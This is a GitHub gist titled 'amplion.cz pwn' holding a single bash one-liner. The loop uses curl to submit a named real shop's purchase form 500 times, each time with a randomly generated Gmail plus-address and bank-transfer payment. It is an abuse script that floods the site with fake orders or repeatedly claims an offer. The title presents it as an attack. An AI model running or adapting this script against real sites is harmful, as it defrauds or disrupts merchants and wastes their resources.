Skip to content

Instantly share code, notes, and snippets.

@starenka
Created May 17, 2011 17:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save starenka/976903 to your computer and use it in GitHub Desktop.
Save starenka/976903 to your computer and use it in GitHub Desktop.
amplion.cz pwn
for i in {1..500}; do rand=`python -c 'from random import choice;import string;print "".join([choice(string.letters+string.digits) for i in range(20)])'`; curl -d "number=1&email=TVUJEMAIL%2B$rand@gmail.com&agreeTerms=on&message=&payment_type=bank+transfer" 'http://amplion.centrum.cz/buy/127?do=saleForm-submit'; done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment